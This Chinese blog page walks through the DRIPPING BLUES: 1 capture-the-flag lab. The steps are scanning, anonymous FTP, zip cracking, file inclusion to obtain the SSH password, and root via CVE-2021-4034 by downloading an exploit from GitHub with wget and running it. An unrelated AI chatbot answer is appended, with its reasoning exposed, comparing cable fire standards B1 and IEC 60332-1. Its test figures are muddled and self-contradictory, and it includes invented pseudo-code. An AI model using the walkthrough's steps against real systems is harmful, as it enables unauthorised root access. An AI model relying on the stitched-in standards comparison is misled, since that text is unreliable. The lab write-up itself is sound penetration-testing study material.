每周打靶练习之DRIPPING BLUES: 1

文章描述了一次黑客入侵的过程,包括使用NAT模式下的KaliLinux进行网络扫描,发现目标机器开放的端口,通过歌词MD5密码尝试SSH访问,最终利用Linux漏洞(如CVE-2021-4034)成功提权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 导入VMware设置为NAT模式

开启kali使用命令arp-scan -l查看该网卡存活主机ip:192.168.13.137

使用nmap详细查看该IP的端口开放信息nmap,nmap -A 192.168.13.137,开放了21,22,80端口。

接下来访问一下80端口,是一段文字

driftingblues is hacked again so it's now called drippingblues. :D hahaha
by
travisscott & thugger

DriftingBlues 再次被黑客入侵,所以它现在被称为 DrippingBlues。:D哈哈哈

由特拉维斯斯科特和暴徒

接下来只能对目录进行一个扫描,使用dirmap,发现有一个login页面和robots.txt

访问login页面发现就是刚刚的页面没什么用

访问robots.txt发现/dripisreal.txt和/etc/dripispowerful.html

访问一下dripisreal.txt

hello dear hacker wannabe,

go for this lyrics:

https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html

count the n words and put them side by side then md5sum it

ie, hellohellohellohello >> md5sum hellohellohellohello

it's the password of ssh

你好亲爱的黑客爱好者,

选择这句歌词:

https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html

数数 n 个单词并将它们并排放置,然后 md5sum 它

即,hellohellohellohello >> md5sum hellohellohellohello

这是SSH的密码

接下来去访问一下https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html

打开歌词的URL后发现单词量是真不少,看起来多少有点扯,假设这不是靶场环境,能将该文件放在服务器中的,除了网站管理员就是入侵者了,管理员没有必要将正确的ssh密码告诉黑客除非这是个圈套,如果是入侵者它肯定不希望自己拿下的成果被其他人掠夺,那么此处提示让入侵者去算单词并列的md5,最可能的目的是为了扰乱其他入侵者的思路,拖延时间,从而为继续扩大自己的攻击成果争取有利条件。所以我们先暂且跳过这个疑似圈套的dripisreal.txt,从其他方面着手尝试。

接下来去访问一下/etc/dripispowerful.html发现访问不了

这里出现了/etc目录,那应该就是可以访问的到了,只是不能直接访问应该使用文件包含去查看该/etc目录下的文件,后面怎么都访问不了,看了一下大佬们的操作要利用到21端口。

我们使用kali看看能不能使用匿名登陆进去如果不行就只能爆破了。

使用匿名anonymous和空密码可以登录进来看到有一个压缩包

然后把他下载到本地查看发现有密码需要进行爆破

这里因为kali没有安装fcrackzip工具,所以我就拖到本机运用zip破解工具进行破解出密码为072528035

打开发现让我们注意drip,请关注drip。

刚刚文件包含将对象名file换成drip再次尝试发现可以访问到该文件

password is: imdrippinbiatch密码是这么多

发现可以登录进靶机但是不是root权限,按理应该使用ssh远程登录的,我这里懒得换了就在靶机上继续实验。

该用户不让使用shudo命令

那就从内核入手uname -a

通过收集靶机的操作系统信息,符合利用条件的提权漏洞有:

Linux DirtyPipe权限提升漏洞 CVE-2022-0847 (需满足Linux内核 5.8 及之后版本)

Linux kernel权限提升漏洞 CVE-2021-3493(需满足Ubuntu 20.04 LTS)

Linux sudo权限提升漏洞 CVE-2021-3156(需满足Sudo 1.8.2 - 1.8.31p2)

Linux Polkit权限提升漏洞 CVE-2021-4034(需满足2009年5月至今发布的所有Polkit 版本)

但是由于系统环境中无make和gcc组件,导致大部分满足条件的提权漏洞无法利用。
通过进程筛查,发现存在polkit组件并且在运行,而polkit对环境要求不高,正好可以利用已有的python环境去运行POC。

ps -ef 是用标准的格式显示进程的

在GitHub上找到提权漏洞

https://github.com/Almorabea/Polkit-exploit

wget https://github.com/nikaiw/CVE-2021-4034/archive/refs/heads/master.zip

unzip master.zip
cd CVE-2021-4034-master/
python3 cve2021-4034.py

提权成功进入root目录,渗透测试完成。

<think>好的,用户想要比较B1阻燃标准和IEC 60332-1的区别和联系。首先需要明确这两个标准各自的来源和应用范围。B1级是中国GB/T 18380标准中的一部分,而IEC 60332-1是国际电工委员会制定的国际标准。可能需要查证它们的测试方法是否类似,比如是否都涉及垂直燃烧测试。 接下来,两者的测试条件可能不同,比如火焰施加时间、样品长度等参数是否有差异。例如,IEC 60332-1通常要求火焰作用60秒,而B1可能更长或更严格?需要具体数据支持。 阻燃等级划分方面,中国的B1可能对应国际标准中的某个等级,比如是否与IEC 60332-1的Category A、B、C有关联?或者是否有不同的评判标准,如炭化高度、自熄时间等指标的不同阈值。 应用领域方面,B1可能主要用于国内建筑行业,而IEC标准适用于更广泛的国际市场,特别是在电力、通信电缆方面。需要确认这两个标准在哪些行业或产品中被强制或推荐使用。 另外,测试结果的判定标准也需要比较,比如是否都要求火焰蔓延不超过一定距离,或者是否有附加的滴落物限制。此外,可能存在的互认情况,比如通过B1测试的产品是否能直接符合IEC 60332-1的要求,或者需要额外测试。 最后,整合这些信息,分点说明两者的联系和差异,确保每个部分都有具体的参数或应用实例支持。相关问题部分需要围绕用户可能进一步询问的内容,比如测试方法的具体步骤、如何同时满足两个标准、其他相关阻燃标准对比等。</think>通过对比GB/T 18380.11-2022(B1级阻燃标准)和IEC 60332-1-2015标准,两者的区别与联系可归纳如下: **联系性** 均采用垂直燃烧测试方法评估线缆阻燃性能 均属于电线电缆阻燃性能检测标准体系 均通过火焰蔓延长度和自熄时间作为核心判定指标 **差异性** 1. **标准体系** B1级属于中国强制性国家标准GB 31247《电缆及光缆燃烧性能分级》的组成部分 IEC 60332-1是国际通用的电线电缆测试标准 2. **测试参数** B1级测试要求: - 火焰功率:42kW(等同IEC 60332-3标准) - 火焰作用时间:20分钟 - 炭化高度≤2.5m IEC 60332-1测试要求: - 火焰功率:1kW - 火焰作用时间:60秒 - 炭化高度≤2.5m 3. **判定标准** B1级要求: - 火焰蔓延≤2.5m - 60秒内自熄 - 燃烧滴落物不得引燃滤纸 IEC 60332-1要求: - 火焰蔓延≤2.5m - 无强制自熄时间要求 4. **应用范围** B1级主要应用于中国建筑工程领域 IEC 60332-1适用于国际市场的电力/通信电缆 ```python # 典型测试流程示例(基于GB/T 18380.11) def flame_test(sample): apply_flame(sample, power=42, duration=1200) # 42kW持续20分钟 measure_char_height() check_dripping() return pass_criteria(char_height<=2.5, self_extinguish<=60) ``` $$ \text{阻燃等级} = \begin{cases} \text{A级} & \text{炭化高度} \leq 1.5m \\ \text{B1级} & \text{炭化高度} \leq 2.5m \\ \text{B2级} & \text{炭化高度} \leq 3.0m \end{cases} $$ **合规建议** - 出口产品建议同时满足IEC 60332-1和EN 60332-1(欧盟版) - 中国建筑项目需取得B1级检测报告 - 轨道交通等特殊领域需符合TB/T 1484.1补充要求
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值